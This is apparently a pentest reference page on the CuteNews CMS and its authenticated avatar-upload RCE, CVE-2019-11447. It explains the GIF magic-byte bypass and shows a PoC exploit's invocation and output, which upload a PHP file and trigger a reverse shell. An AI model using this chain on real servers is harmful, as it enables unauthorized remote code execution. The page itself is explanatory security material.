CuteNews
CuteNews is a lightweight, flat-file CMS designed primarily for managing and publishing news articles or blog posts without the need for a database backend. Developed in PHP, it stores content in plain text files, making it easier to deploy on minimal hosting environments. While its simplicity makes it attractive for small websites and personal blogs, its limited security mechanisms have led to multiple vulnerabilities over time.
Authenticated RCE
CuteNews version 2.1.2
is affected by an arbitrary file upload vulnerability (CVE-2019-11447). This flaw lies in the way the application handles avatar uploads in the user profile section. Specifically, the avatar_file
parameter passed to index.php?mod=main&opt=personal
allows an attacker to upload a malicious file disguised as an image. Due to insufficient validation of the $imgsize
variable in /core/modules/dashboard.php
, the application fails to properly inspect the uploaded file’s content. This enables an attacker to manipulate the file’s header—for instance, by adding a GIF file signature—to bypass content filters and achieve RCE. A working PoC is available:
$ python3 exploit.py -l http://cn-instance -u test123 -p test123 -e test@mail.com
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://cn-instance/uploads/avatar_test123_test123.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
Last updated
Was this helpful?